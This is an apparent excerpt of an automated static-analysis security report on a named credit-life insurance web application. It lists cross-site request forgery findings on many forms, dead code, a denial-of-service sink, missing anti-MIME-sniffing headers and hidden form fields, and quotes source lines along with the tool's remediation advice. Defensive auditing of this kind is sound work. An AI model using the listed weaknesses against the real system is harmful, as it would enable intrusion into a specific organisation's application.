s():1)),y&&(y=parseFloat(y)*(y.indexOf(B)>-1?t||s():1)),w.hasquery&&(z&&A||!(z||m>=x)||!(A||
y>=m))||(n[w.media]||(n[w.media]=[]),n[w.media].push(f[w.rules]))}for(var C in
g)g.hasOwnProperty(C)&&g[C]&&g[C].parentNode===j&&j.removeChild(g[C]);for(var D in
n)if(n.hasOwnProperty(D)){var E=c.createElement("style"),F=n[D].join("\n");E.type="text/
css",E.media=D,j.insertBefore(E,o.nextSibling),E.styleSheet?
E.styleSheet.cssText=F:E.appendChild(c.createTextNode(F)),g.push(E)}},v=function(a,b){var
c=w();c&&(c.open("GET",a,!0),c.onreadystatechange=function(){4!==c.readyState||200!
==c.status&&304!==c.status||b(c.responseText)},4!==c.readyState&&c.send(null))},w=function()
{var b=!1;try{b=new a.XMLHttpRequest}catch(c){b=new a.ActiveXObject("Microsoft.XMLHTTP")}
return function(){return b}}();n(),b.update=n,a.addEventListener?
a.addEventListener("resize",x,!1):a.attachEvent&&a.attachEvent("onresize",x)}})(this);
7
8 undefined
9 undefined
Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.assets.modules.js

Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/modules/js/
Low
TransInfo.js, line 4 (Cross-Site Request Forgery)
Issue Details
Sink Details
Enclosing Method: transInfo()
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/modules/js/TransInfo.js:4
Taint Flags:
1
2 function transInfo(obj, id) {
Oct 5, 2018, 5:40 PM 28

Low
TransInfo.js, line 4 (Cross-Site Request Forgery)
3 var url = $("#urlTransInfo").val() + '?obj=' + obj + '&id=' + id;
4 $.post(url, {}, function (data) {
5 $("#created_user").val('');
6 $("#created_date").val('');
7 $("#updated_user").val('');

Low
QuestionRelation.js, line 9 (Cross-Site Request Forgery)
Issue Details
Sink Details
Enclosing Method: lambda()
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/modules/js/QuestionRelation.js:9
Taint Flags:
6
7 if (dID != "") {
8 var url = $("#getSubQuestionUrl").val();
9 $.getJSON(url, { questionid: dID },
10 function (data) {
11 var select = $("#sub_question_id");
12 select.empty();

Low
regmcu.js, line 50 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/modules/js/regmcu.js:50
Taint Flags:
47 $('#findDataMCUBtn').click(function () {
48 var el = $(".MCUData");
49 App.blockUI({target:".MCUData"});
50 $.getJSON("getMPMCU",
51 { mp_name_val: $('#mp_name_val').val(), mp_addr: $('#mp_addr').val(), mp_std: $
('#mp_std').val(), mp_oh: $('#mp_oh').val() },
Oct 5, 2018, 5:40 PM 29

regmcu.js, line 50 (Cross-Site Request Forgery) Low
53 var len = data.length;

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Administration.Views.Approval
Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/obj/Release/Package/
PackageTmp/Areas/Administration/Views/Approval/ApprovalForm.cshtml, line 25 Low
(Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/obj/Release/Package/PackageTmp/Areas/Administration/
Views/Approval/ApprovalForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action("ApprovePar", "Approval")">

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Administration.Views.ApprovalPrdct
PackageTmp/Areas/Administration/Views/ApprovalPrdct/ Low
ApprovalPrdctForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Sink Details
Views/ApprovalPrdct/ApprovalPrdctForm.cshtml:25
Taint Flags:
Oct 5, 2018, 5:40 PM 30

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Administration.Views.ApprovalPrdct
PackageTmp/Areas/Administration/Views/ApprovalPrdct/ Low
ApprovalPrdctForm.cshtml, line 25 (Cross-Site Request Forgery)
"ApprovalPrdct")">

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Administration.Views.ApprovalQues
PackageTmp/Areas/Administration/Views/ApprovalQues/ Low
ApprovalQuesForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Sink Details
Views/ApprovalQues/ApprovalQuesForm.cshtml:25
Taint Flags:
"ApprovalQues")">

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Administration.Views.GenSetting
PackageTmp/Areas/Administration/Views/GenSetting/SettingForm.cshtml, line Low
25 (Cross-Site Request Forgery)
Issue Details
Sink Details
Views/GenSetting/SettingForm.cshtml:25
Taint Flags:
Oct 5, 2018, 5:40 PM 31

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Administration.Views.GenSetting
PackageTmp/Areas/Administration/Views/GenSetting/SettingForm.cshtml, line Low
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.setting_id <= 0) ?
"Add" : "Edit", "GenSetting")">

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Administration.Views.Menu
PackageTmp/Areas/Administration/Views/Menu/Tree.cshtml, line 24 (Cross-Site Low
Request Forgery)
Issue Details
Sink Details
Views/Menu/Tree.cshtml:24
Taint Flags:
21 <div class="page-title"></div>
24 <form class="form-horizontal" name="frmMenuTree" method="post"
action="@Url.Action("SaveTree", "Menu")">
25 <textarea id="nestable_list_1_output" name="nestable_list_1_output" class="form-control
col-md-12 margin-bottom-10;" style="display:none;"></textarea>
26
27

PackageTmp/Areas/Administration/Views/Menu/MenuForm.cshtml, line 26 Low
Issue Details
Sink Details
Oct 5, 2018, 5:40 PM 32

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Administration.Views.Menu
PackageTmp/Areas/Administration/Views/Menu/MenuForm.cshtml, line 26 Low
Views/Menu/MenuForm.cshtml:26
Taint Flags:
26 <form class="form-horizontal" method="post" action="@Url.Action((Model.menu_id <= 0) ?
"Add" : "Edit", "Menu")">

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Administration.Views.Param
PackageTmp/Areas/Administration/Views/Param/ParamForm.cshtml, line 25 Low
Issue Details
Sink Details
Views/Param/ParamForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.param_id <= 0) ?
"Add" : "Edit", "Param")">

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Administration.Views.ParamGroup
PackageTmp/Areas/Administration/Views/ParamGroup/ Low
ParamGroupForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Oct 5, 2018, 5:40 PM 33

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Administration.Views.ParamGroup
PackageTmp/Areas/Administration/Views/ParamGroup/ Low
ParamGroupForm.cshtml, line 25 (Cross-Site Request Forgery)
Sink Details
Views/ParamGroup/ParamGroupForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.paramgroup_id <=
0) ? "Add" : "Edit", "ParamGroup")">

PackageTmp/Areas/Administration/Views/ParamGroup/Index.cshtml, line 36 Low
Issue Details
Sink Details
Views/ParamGroup/Index.cshtml:36
Taint Flags:
34 </div>
36 <form class="form-horizontal" action="@Url.Action("Index", "paramgroup")" method="post">

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Administration.Views.User
PackageTmp/Areas/Administration/Views/User/Index.cshtml, line 36 (Cross-Site Low
Request Forgery)
Issue Details
Oct 5, 2018, 5:40 PM 34

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Administration.Views.User
PackageTmp/Areas/Administration/Views/User/Index.cshtml, line 36 (Cross-Site Low
Request Forgery)
Sink Details
Views/User/Index.cshtml:36
Taint Flags:
34 </div>
36 <form class="form-horizontal" action="@Url.Action("Index", "User")" method="post">

PackageTmp/Areas/Administration/Views/User/UserForm.cshtml, line 25 (Cross- Low
Site Request Forgery)
Issue Details
Sink Details
Views/User/UserForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.user_id <= 0) ?
"Add" : "Edit", "User")">
Oct 5, 2018, 5:40 PM 35

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Administration.Views.UserGroup
PackageTmp/Areas/Administration/Views/UserGroup/UGPermission.cshtml, line Low
Issue Details
Sink Details
Views/UserGroup/UGPermission.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action("Permission",
"usergroup")">
26 <div class="portlet box red">
28 <div class="caption"><i class="fa fa-cogs"></i> Usergroup Permission</div>

PackageTmp/Areas/Administration/Views/UserGroup/UserGroupForm.cshtml, Low
line 25 (Cross-Site Request Forgery)
Issue Details
Sink Details
Views/UserGroup/UserGroupForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.usergroup_id <=
0) ? "Add" : "Edit", "UserGroup")">
Oct 5, 2018, 5:40 PM 36

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Master.Views.BMI
PackageTmp/Areas/Master/Views/BMI/BMIForm.cshtml, line 22 (Cross-Site Low
Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/obj/Release/Package/PackageTmp/Areas/Master/Views/
BMI/BMIForm.cshtml:22
Taint Flags:
22 <form class="form-horizontal" method="post" action="@Url.Action((Model.bmi_id <= 0) ?
"Add" : "Edit", "BMI")">

PackageTmp/Areas/Master/Views/BMI/Index.cshtml, line 36 (Cross-Site Request Low
Forgery)
Issue Details
Sink Details
BMI/Index.cshtml:36
Taint Flags:
34 </div>
36 <form class="form-horizontal" action="@Url.Action("Index", "BMI")" method="post">
Oct 5, 2018, 5:40 PM 37

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Master.Views.CutOff
PackageTmp/Areas/Master/Views/CutOff/CutOffForm.cshtml, line 24 (Cross-Site Low
Request Forgery)
Issue Details
Sink Details
CutOff/CutOffForm.cshtml:24
Taint Flags:
24 <form class="form-horizontal" method="post" action="@Url.Action((Model.cutoff_id <= 0) ?
"Add" : "Edit", "CutOff")">

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Master.Views.Group
PackageTmp/Areas/Master/Views/Group/GroupForm.cshtml, line 25 (Cross-Site Low
Request Forgery)
Issue Details
Sink Details
Group/GroupForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.question_group_id
<= 0) ? "Add" : "Edit", "Group")">
Oct 5, 2018, 5:40 PM 38

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Master.Views.MP
PackageTmp/Areas/Master/Views/MP/MPForm.cshtml, line 25 (Cross-Site Low
Request Forgery)
Issue Details
Sink Details
MP/MPForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.mp_id <= 0) ?
"Add" : "Edit", "MP")">

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Master.Views.Partner
PackageTmp/Areas/Master/Views/Partner/PartnerForm.cshtml, line 25 (Cross- Low
Issue Details
Sink Details
Partner/PartnerForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" id="commentForm"
action="@Url.Action((Model.partner_id <= 0) ? "Add" : "Edit", "Partner")">
Oct 5, 2018, 5:40 PM 39

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Master.Views.Product
PackageTmp/Areas/Master/Views/Product/ProductForm.cshtml, line 25 (Cross- Low
Issue Details
Sink Details
Product/ProductForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.product_id ==
null) ? "Add" : "Edit", "Product")">

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Master.Views.Question
PackageTmp/Areas/Master/Views/Question/QuestionForm.cshtml, line 25 (Cross- Low
Issue Details
Sink Details
Question/QuestionForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.question_id ==
null) ? "Add" : "Edit", "Question")">
Oct 5, 2018, 5:40 PM 40

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Master.Views.QuestionDoc
PackageTmp/Areas/Master/Views/QuestionDoc/QuestionDocForm.cshtml, line 25 Low
Issue Details
Sink Details
QuestionDoc/QuestionDocForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.document_id <= 0) ?
"Add" : "Edit", "QuestionDoc")" id="QuestionDoc" enctype="multipart/form-data">

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Master.Views.QuestionGroup
PackageTmp/Areas/Master/Views/QuestionGroup/QuestionGroupForm.cshtml, Low
line 25 (Cross-Site Request Forgery)
Issue Details
Sink Details
QuestionGroup/QuestionGroupForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.question_mapping_id
<= 0) ? "Add" : "Edit", "QuestionGroup")">
Oct 5, 2018, 5:40 PM 41

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Master.Views.QuestionRelation
PackageTmp/Areas/Master/Views/QuestionRelation/ Low
QuestionRelationForm.cshtml, line 25 (Cross-Site Request Forgery)
Issue Details
Sink Details
QuestionRelation/QuestionRelationForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post"
action="@Url.Action((Model.question_relation_id <= 0) ? "Add" : "Edit", "QuestionRelation")">

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Master.Views.Rate
PackageTmp/Areas/Master/Views/Rate/RateForm.cshtml, line 25 (Cross-Site Low
Request Forgery)
Issue Details
Sink Details
Rate/RateForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" id="MRate" action="@Url.Action((Model.rate_id
<= 0) ? "Add" : "Edit", "Rate")">
Oct 5, 2018, 5:40 PM 42

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Master.Views.SubQuestion
PackageTmp/Areas/Master/Views/SubQuestion/SubQuestionForm.cshtml, line 25 Low
Issue Details
Sink Details
SubQuestion/SubQuestionForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.sub_question_id ==
null) ? "Add" : "Edit", "SubQuestion")">

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Master.Views.Sumins
PackageTmp/Areas/Master/Views/Sumins/SIAForm.cshtml, line 25 (Cross-Site Low
Request Forgery)
Issue Details
Sink Details
Sumins/SIAForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action((Model.id <= 0) ? "Add" :
"Edit", "Sumins")">
Oct 5, 2018, 5:40 PM 43

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Reg.Views.Registration
PackageTmp/Areas/Reg/Views/Registration/Index.cshtml, line 37 (Cross-Site Low
Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/obj/Release/Package/PackageTmp/Areas/Reg/Views/
Registration/Index.cshtml:37
Taint Flags:
35 </div>

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Underwriting.Views.PostFilter
PackageTmp/Areas/Underwriting/Views/PostFilter/PostFilterForm.cshtml, line 25 Low
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/obj/Release/Package/PackageTmp/Areas/Underwriting/
Views/PostFilter/PostFilterForm.cshtml:25
Taint Flags:
25 <form class="form-horizontal" method="post" action="@Url.Action("Edit", "PostFilter")">
Oct 5, 2018, 5:40 PM 44

20181005_CLS.CLS.obj.Release.Package.PackageTmp.Areas.Underwriting.Views.PostFilter
PackageTmp/Areas/Underwriting/Views/PostFilter/Index.cshtml, line 36 (Cross- Low
Issue Details
Sink Details
Views/PostFilter/Index.cshtml:36
Taint Flags:
34 </div>
36 <form class="form-horizontal" action="@Url.Action("Index", "postfilter")" method="post">

20181005_CLS.CLS.obj.Release.Package.PackageTmp.assets.modules.js
Low
PackageTmp/assets/modules/js/regmcu.js, line 50 (Cross-Site Request Forgery)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/obj/Release/Package/PackageTmp/assets/modules/js/
regmcu.js:50
Taint Flags:
Oct 5, 2018, 5:40 PM 45

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.packages.jQuery.
1.10.2.Content.Scripts
Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/packages/jQuery.1.10.2/
Low
Content/Scripts/jquery-1.10.2-vsdoc.js, line 1854 (Cross-Site Request Forgery)
Issue Details
Sink Details
Sink: FunctionPointerCall: get
Enclosing Method: getScript()
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/packages/jQuery.1.10.2/Content/Scripts/jquery-1.10.2-vsdoc.js:
1854
Taint Flags:
1851 /// A callback function that is executed if the request succeeds.
1852 /// </param>
1853
1854 return jQuery.get( url, undefined, callback, "script" );
1855 };
1856 jQuery.globalEval = function( data ) {
1857 /// <summary>

Low
Content/Scripts/jquery-1.10.2-vsdoc.js, line 1841 (Cross-Site Request Forgery)
Issue Details
Sink Details
Enclosing Method: getJSON()
1841
Taint Flags:
1839 /// </param>
1840
1841 return jQuery.get( url, data, callback, "json" );
1842 };
1843 jQuery.getScript = function( url, callback ) {
1844 /// <summary>
Oct 5, 2018, 5:40 PM 46

Dead Code: Unused Field (6 issues)
Abstract
This field is never used directly or indirectly by a public method.
Explanation
This field is never accessed, except perhaps by dead code. Dead code is defined as code that is never
directly or indirectly executed by a public method. It is likely that the field is simply vestigial, but it is also
possible that the unused field points out a bug.
Example 1: The field named glue is not used in the following class. The author of the class has
accidentally put quotes around the field name, transforming it into a string constant.
public class Dead {
string glue;
public string GetGlue() {

return "glue";
}
Example 2: The field named glue is used in the following class, but only from a method that is never
called by a public method.
public class Dead {
string glue;
private string GetGlue() {

return glue;
}
Recommendation
In general, you should repair or remove dead code. To repair dead code, execute the dead code directly or
indirectly through a public method. Dead code causes additional complexity and maintenance burden
without contributing to the functionality of the program.
Issue Summary
Oct 5, 2018, 5:40 PM 47

Engine Breakdown
Dead Code: Unused Field 6 0 0 6
Total 6 0 0 6
Dead Code: Unused Field Low

Package: CLS.Areas.Administration.Controllers
Low
Controllers/ApprovalController.cs, line 20 (Dead Code: Unused Field)
Issue Details
Kingdom: Code Quality
Sink Details
Sink: Field: _ObjCode
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/Controllers/ApprovalController.cs:
20
Taint Flags:
17 private IParamGroupService repoPG;
18 private IMenuRepository repoMenu;
19 private IUserGroupService repoUG;
20 private string _ObjCode = "PAR";
21 private QuestionDoc qDoc = null;
22
23 List<String> Scripts = new List<String>();

Low
Controllers/ApprovalController.cs, line 21 (Dead Code: Unused Field)
Issue Details
Sink Details
Sink: Field: qDoc
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Administration/Controllers/ApprovalController.cs:
Oct 5, 2018, 5:40 PM 48

Package: CLS.Areas.Administration.Controllers
Controllers/ApprovalController.cs, line 21 (Dead Code: Unused Field) Low
21
Taint Flags:
18 private IMenuRepository repoMenu;
19 private IUserGroupService repoUG;
20 private string _ObjCode = "PAR";
21 private QuestionDoc qDoc = null;
22
23 List<String> Scripts = new List<String>();
24 CSS_REF oCSSRef = new CSS_REF();
Package: CLS.Repositories.Impl
Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Repositories/Impl/
Low
UserRepository.cs, line 16 (Dead Code: Unused Field)
Issue Details
Sink Details
Sink: Field: _ObjCode
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Repositories/Impl/UserRepository.cs:16
Taint Flags:
13 public class UserRepository : BasicRepository, IUserRepository
14 {
15 AES aES = null;
16 private string _ObjCode = "USR";
17
18 public User add(User user)
19 {
Package: CLS.Utils.Helper
Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Utils/Helper.cs, line 74
Low
(Dead Code: Unused Field)
Issue Details
Sink Details
Sink: Field: _LabelApproval
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Utils/Helper.cs:74
Taint Flags:
Oct 5, 2018, 5:40 PM 49

Low
71 new labelStatus() { Status = "Waiting Payment", Label = "<span class=\"label label-sm
label-warning\"> Waiting Payment </span>"}
72 };
73
74 private static List<labelStatus> _LabelApproval = new List<labelStatus>()
75 {
76 new labelStatus() { Status = "Pending", Label = "<span class=\"label label-sm label-warning
\"> Pending </span>"},
77 new labelStatus() { Status = "Approved", Label = "<span class=\"label label-sm label-
success\"> Approved </span>"},

Low
Issue Details
Sink Details
Sink: Field: _LabelStatus
Taint Flags:
57 new labelActiveStatus() { Status = false, Label = "<span class=\"label label-sm label-
danger\"> Not Active </span>"}
58 };
59
60 private static List<labelStatus> _LabelStatus = new List<labelStatus>()
61 {
62 new labelStatus() { Status = "On Process", Label = "<span class=\"label label-sm label-
warning\"> On Process </span>"},
63 new labelStatus() { Status = "Pending", Label = "<span class=\"label label-sm label-warning
\"> Pending </span>"},

Low
Issue Details
Sink Details
Sink: Field: _LabelActiveStatus
Taint Flags:
51 return retVal;
Oct 5, 2018, 5:40 PM 50

(Dead Code: Unused Field) Low
52 }
53
54 private static List<labelActiveStatus> _LabelActiveStatus = new List<labelActiveStatus>()
55 {
56 new labelActiveStatus() { Status = true, Label = "<span class=\"label label-sm label-
success\"> Active </span>"},
57 new labelActiveStatus() { Status = false, Label = "<span class=\"label label-sm label-
danger\"> Not Active </span>"}
Oct 5, 2018, 5:40 PM 51

Dead Code: Unused Method (1 issue)
Abstract
This method is not reachable from any method outside the class.
Explanation
This method is never called or is only called from other dead code. Dead code is defined as code that is
never directly or indirectly executed by a public method.
Example 1: In the following class, the method DoWork() can never be called.
public class Dead {

private void DoWork() {
Console.Write("doing work");
}
public static void Main(string[] args) {
Console.Write("running Dead");
}
}
Example 2: In the following class, two private methods call each other, but since neither one is ever
invoked from anywhere else, they are both dead code.
public class DoubleDead {

private void DoTweedledee() {
DoTweedledumb();
}
private void DoTweedledumb() {
DoTweedledee();
}
public static void Main(string[] args) {
Console.Write("running DoubleDead");
}
}
(In this case it is a good thing that the methods are dead: invoking either one would cause an infinite loop.)
Recommendation
A dead method may indicate a bug in dispatch code.
Example 3: If method is flagged as dead named GetWitch() in a class that also contains the following
dispatch method, it may be because of a copy-and-paste error. The 'w' case should return GetWitch()
not GetMummy().
public ScaryThing GetScaryThing(char st) {

switch(st) {
case 'm':
return GetMummy();
Oct 5, 2018, 5:40 PM 52

case 'w':
return GetMummy();
default:
return GetBlob();
}
}
In general, you should repair or remove dead code. To repair dead code, execute the dead code directly or
indirectly through a public method. Dead code causes additional complexity and maintenance burden
without contributing to the functionality of the program.
Issue Summary
Engine Breakdown
Dead Code: Unused Method 1 0 0 1
Total 1 0 0 1
Dead Code: Unused Method Low

Low
MenuRepository.cs, line 344 (Dead Code: Unused Method)
Issue Details
Sink Details
Sink: Function: buildMenuStructure
Enclosing Method: buildMenuStructure()
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Repositories/Impl/MenuRepository.cs:344
Taint Flags:
341 }
342
343
344 private void buildMenuStructure(ref System.Text.StringBuilder MenuString, int MenuID,
Menu CurrentMenu)
345 {
Oct 5, 2018, 5:40 PM 53

Dead Code: Unused Method Low
Low
MenuRepository.cs, line 344 (Dead Code: Unused Method)
346 // Get the menu first
347 Menu oMenu = get(MenuID);
Oct 5, 2018, 5:40 PM 54

Denial of Service (1 issue)
Abstract
An attacker could cause the program to crash or otherwise become unavailable to legitimate users.
Explanation
Attackers may be able to deny service to legitimate users by flooding the application with requests, but
flooding attacks can often be defused at the network layer. More problematic are bugs that allow an
attacker to overload the application using a small number of requests. Such bugs allow the attacker to
specify the quantity of system resources their requests will consume or the duration for which they will use
them.
Example 1: The following code allows a user to specify the size of the file system to be used. By specifying
a large number, an attacker may deplete file system resources.
var fsync = requestFileSystemSync(0, userInput);
Example 2: The following code writes to a file. Because the file may be continuously written and re-written
until it is deemed closed by the user agent, disk quota, IO bandwidth, and processes that may require
analyzing the content of the file are impacted.
function oninit(fs) {
fs.root.getFile('applog.txt', {create: false}, function(fileEntry) {
fileEntry.createWriter(function(fileWriter) {
fileWriter.seek(fileWriter.length);
var bb = new BlobBuilder();
bb.append('Appending to a file');
fileWriter.write(bb.getBlob('text/plain'));
}, errorHandler);
}, errorHandler);
}
window.requestFileSystem(window.TEMPORARY, 1024*1024, oninit, errorHandler);
Recommendation
Validate user input to ensure that it will not cause inappropriate resource utilization.
Example 3: The following code allows a user to specify the size of the file system just as in Example 1, but
only if the value is within reasonable bounds.
if (userInput >= SIZE_MIN &&

userInput <= SIZE_MAX) {
var fsync = requestFileSystemSync(0, userInput);
} else {
throw "Invalid file system size";
}
}
Oct 5, 2018, 5:40 PM 55

Example 4: The following code writes to a file just as in Example 2, but the maximum file size is
MAX_FILE_LEN.
function oninit(fs) {
fs.root.getFile('applog.txt', {create: false}, function(fileEntry) {
fileEntry.createWriter(function(fileWriter) {
fileWriter.seek(fileWriter.length);
var bb = new BlobBuilder();
bb.append('Appending to a file');
if (fileWriter.length + bb.size <= MAX_FILE_LEN) {
fileWriter.write(bb.getBlob('text/plain'));
}
}, errorHandler);
}, errorHandler);
}
window.requestFileSystem(window.TEMPORARY, 1024*1024, oninit, errorHandler);
Issue Summary
Engine Breakdown
Denial of Service 1 0 0 1
Total 1 0 0 1
Denial of Service Low

Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.assets.global.plugins.datatables
Low
datatables/datatables.js, line 31329 (Denial of Service)
Issue Details
Kingdom: Input Validation and Representation
Sink Details
Enclosing Method: embedTTF()
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/global/plugins/datatables/datatables.js:31329
Oct 5, 2018, 5:40 PM 56

Denial of Service Low
Low
datatables/datatables.js, line 31329 (Denial of Service)
Taint Flags:
31326 var charWidths, cmap, code, data, descriptor, firstChar, fontfile, glyph;
31327 data = this.subset.encode();
31328 fontfile = this.document.ref();
31329 fontfile.write(data);
31330 fontfile.data.Length1 = fontfile.uncompressedLength;
31331 fontfile.end();
31332 descriptor = this.document.ref({
Oct 5, 2018, 5:40 PM 57

HTML5: MIME Sniffing (1 issue)
Abstract
The web.config file does not include the required header to mitigate MIME sniffing attacks
Explanation
MIME sniffing, is the practice of inspecting the content of a byte stream to attempt to deduce the file format
of the data within it.
If MIME sniffing is not explicitly disabled, some browsers can be manipulated into interpreting data in a way
that is not intended, allowing for cross-site scripting attacks.
For each page that could contain user controllable content, you should use the HTTP Header X-Content-
Type-Options: nosniff.
Recommendation
To mitigate this finding, the programmer can either: (1) set it globally for all pages in the application in the
web.config file, or (2) set the required header page by page for only those pages that might contain user-
controllable content.
To set it globally add the header in the web.config file for the application being hosted by Internet
Information Services (IIS):
<system.webServer>
<httpProtocol>
<customHeaders>
<add name="X-Content-Type-Options" value="nosniff"/>
</customHeaders>
</httpProtocol>
</system.webServer>
The following examples shows how to add the header to the global Application_BeginRequest
method:
void Application_BeginRequest(object sender, EventArgs e)

{
this.Response.Headers["X-Content-Type-Options"] = "nosniff";
}
The following example shows how to add it to a page by implementing a custom HTTP module using the
IHttpModule interface
public class XContentTypeOptionsModule : IHttpModule

{
...
void context_PreSendRequestHeaders(object sender, EventArgs e)
{
HttpApplication application = sender as HttpApplication;
Oct 5, 2018, 5:40 PM 58

if (application == null) return;
if (application.Response.Headers["X-Content-Type-Options"] != null)
return;
application.Response.Headers.Add("X-Content-Type-Options", "nosniff");
}
}
Issue Summary
Engine Breakdown
HTML5: MIME Sniffing 1 0 0 1
Total 1 0 0 1
HTML5: MIME Sniffing Medium

20181005_CLS.CLS.obj.Release.TransformWebConfig.assist
Medium
TransformWebConfig/assist/Web.config, line 0 (HTML5: MIME Sniffing)
Issue Details
Sink Details
Sink: //system.webServer/httpProtocol/customHeaders
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/obj/Release/TransformWebConfig/assist/Web.config:0
Taint Flags:
1 <?xml version="1.0"?>
2
3 
4
5 undefined
6 undefined
7 undefined
Oct 5, 2018, 5:40 PM 59

Hidden Field (5 issues)
Abstract
A hidden form field is used.
Explanation
Programmers often trust the contents of hidden fields, expecting that users will not be able to view them or
manipulate their contents. Attackers will violate these assumptions. They will examine the values written to
hidden fields and alter them or replace the contents with attack data.
Example: An tag of type hidden indicates the use of a hidden field.
<input type="hidden">
If hidden fields carry sensitive information, this information will be cached the same way the rest of the
page is cached. This can lead to sensitive information being tucked away in the browser cache without the
user's knowledge.
Recommendation
Expect that attackers will study and decode all uses of hidden fields in the application. Treat hidden fields
as untrusted input. Don't store information in hidden fields if the information should not be cached along
with the rest of the page.
Issue Summary
Engine Breakdown
Hidden Field 5 0 0 5
Total 5 0 0 5
Oct 5, 2018, 5:40 PM 60

Hidden Field Low
20181005_CLS.CLS.Areas.Underwriting.Views.Assessment
Low
Views/Assessment/CalcPremiForm.cshtml, line 35 (Hidden Field)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Areas/Underwriting/Views/Assessment/
CalcPremiForm.cshtml:35
Taint Flags:
32 </div>
34 <input type="text" id="load_eo_view" name="load_eo_view" readonly="readonly" class="form-
control col-md-1" />
35 <input type="hidden" id="load_eo" name="load_eo" class="form-control col-md-1" />
36 </div>
37 </div>

Low
Registration/ShrdCalcPremiForm.cshtml, line 51 (Hidden Field)
Issue Details
Sink Details
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/Views/Shared/Registration/ShrdCalcPremiForm.cshtml:
51
Taint Flags:
48 </div>
control input-sm input-xsmall" />
52 </div>
